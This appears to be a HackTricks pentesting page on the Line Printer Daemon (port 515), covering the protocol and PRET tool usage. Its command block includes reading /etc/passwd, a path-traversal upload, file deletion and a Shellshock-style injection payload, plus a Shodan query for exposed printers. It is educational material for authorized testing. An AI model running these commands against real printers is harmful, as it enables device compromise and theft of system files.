515-pentesting-line-printer-daemon-lpd.md (3604B)
1 --- 2 title: "515 - Pentesting Line Printer Daemon (LPD)" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # 515 - Pentesting Line Printer Daemon (LPD) 14 15 ## Introduction to LPD 16 17 RFC 1179 documents the Berkeley Line Printer Daemon protocol. It is TCP-based, listens on port **515** by convention, and supports queue inspection, job submission, and job removal. A submitted job contains a control file describing the job and a data file containing the printable content.<sup>[[1]](#references)</sup> 18 19 The RFC describes the wire protocol, but printer languages and file-handling behavior depend on the server and printer implementation. During an authorized assessment, enumerate queue names and capabilities before sending test jobs; avoid destructive filesystem or command tests against production printers. 20 21 An LPD data file may be interpreted as PostScript, PJL, or another printer language. On devices that expose powerful language extensions, a malicious print job can therefore reach functionality beyond ordinary printing; the available filesystem, memory, or command primitives are model- and implementation-specific.<sup>[[2]](#references)[[3]](#references)</sup> 22 23 LPRng is a well-known Unix-like implementation of the Berkeley printing system. Its suite includes the `lpd` server and clients such as `lpr`, `lpq`, and `lprm`.<sup>[[4]](#references)</sup> A standard `lpr` client can submit a benign test file when the queue name is known; for example, Windows uses:<sup>[[5]](#references)</sup> 24 25 ```batch 26 lpr -S <host> -P <queue> -o test.txt 27 ``` 28 29 The Hacking Printers wiki remains a useful catalog of printer languages, protocols, attack classes, and device-specific research beyond the LPD-focused commands on this page.<sup>[[6]](#references)</sup> 30 31 ## PRET LPD tools 32 33 [PRET](https://github.com/RUB-NDS/PRET) includes `lpdprint.py` for submitting print data and `lpdtest.py` for testing implementation-specific LPD behavior. The latter exposes potentially destructive operations; use them only where the target and action are explicitly authorized.<sup>[[2]](#references)</sup> 34 35 ```bash 36 # To print a file to an LPD printer 37 lpdprint.py hostname filename 38 # To get a file from the printer 39 lpdtest.py hostname get /etc/passwd 40 # To upload a file to the printer 41 lpdtest.py hostname put ../../etc/passwd 42 # To remove a file from the printer 43 lpdtest.py hostname rm /some/file/on/printer 44 # To execute a command injection on the printer 45 lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4' 46 # To send a mail through the printer 47 lpdtest.py hostname mail lpdtest@mailhost.local 48 ``` 49 50 ## Shodan 51 52 - `port 515` 53 54 ## References 55 56 - [1] [RFC 1179 - Line Printer Daemon Protocol](https://www.rfc-editor.org/rfc/rfc1179.html) 57 - [2] [PRET - Printer Exploitation Toolkit](https://github.com/RUB-NDS/PRET) 58 - [3] [Ruhr University Bochum - SoK: Exploiting Network Printers](https://www.nds.rub.de/research/publications/sok-exploiting-network-printers/) 59 - [4] [LPRng documentation](https://lprng.sourceforge.net/docs.html) 60 - [5] [Microsoft Learn - `lpr` command](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/lpr) 61 - [6] [Hacking Printers Wiki](http://hacking-printers.net/wiki/index.php/Main_Page)